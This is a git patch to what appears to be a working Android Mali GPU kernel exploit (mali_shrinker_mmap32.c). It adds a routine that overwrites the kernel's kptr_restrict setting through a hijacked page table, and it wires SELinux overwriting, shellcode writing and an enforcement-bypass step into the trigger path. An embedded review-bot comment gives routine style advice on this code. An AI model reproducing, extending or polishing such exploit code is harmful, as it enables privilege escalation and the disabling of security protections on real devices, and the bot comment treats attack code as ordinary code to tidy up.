From fa095e03f37aa7780f391f471b6e9e3263558e23 Mon Sep 17 00:00:00 2001
From: yuu <46545607+mouseos@users.noreply.github.com>
Date: Thu, 9 May 2024 13:55:53 +0900
Subject: [PATCH] =?UTF-8?q?kallsyms=E3=82=A2=E3=83=89=E3=83=AC=E3=82=B9?=
 =?UTF-8?q?=E3=81=8C=E8=AA=AD=E3=82=81=E3=82=8B=E5=87=A6=E7=90=86=E3=82=92?=
 =?UTF-8?q?=E8=BF=BD=E5=8A=A0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com>
---
 mali_shrinker_mmap32.c | 21 ++++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)

diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
index 31c1c22..08bf7d8 100644
--- a/mali_shrinker_mmap32.c
+++ b/mali_shrinker_mmap32.c
@@ -729,7 +729,21 @@ void spray(int mali_fd) {
 }
 }
+static uint64_t kptr_restrict = 0x1147178;
+void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
+ uint64_t* reserved) {
+ uint64_t kptr_restrict_addr =
+ (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t),
+ kptr_restrict_addr, atom_number++,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+ usleep(300000);
+ // shellcode
+ write_data(mali_fd2, kptr_restrict, reserved,
+ TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+}
 int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
 if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
 err(1, "Out of memory.");
@@ -775,10 +789,15 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
 uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
 LOG("Found pgd %d, %llx\n", pgd_idx, pgd);
 atom_number++;
+ write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ usleep(100000);
+ write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
 usleep(100000);
 write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
 usleep(100000);
+
+ printf("time to run_enforce\n");
 run_enforce();
 run_enforce_un();
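Review bot: The `// shellcode` comment above the `write_data` call in `write_kptr_restrict` does not describe the line under it, which passes `kptr_restrict` as the destination rather than any shellcode buffer; it reads like a leftover copied from `write_shellcode` and should be replaced or dropped, e.g. `// overwrite kptr_restrict (not the shellcode region)`. Separately, `static uint64_t kptr_restrict = 0x1147178;` is never reassigned anywhere in the hunk, so `static const uint64_t` would state that intent and let the compiler reject an accidental write. Nothing in the hunk records what the constant is, so a one-line comment saying it is a build-specific offset would help the next reader. The function is complete within the hunk.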
@@ -851,4 +870,4 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi
 }
 return -1;
 }
-#endif
\ No newline at end of file
+#endif
\ No newline at end of file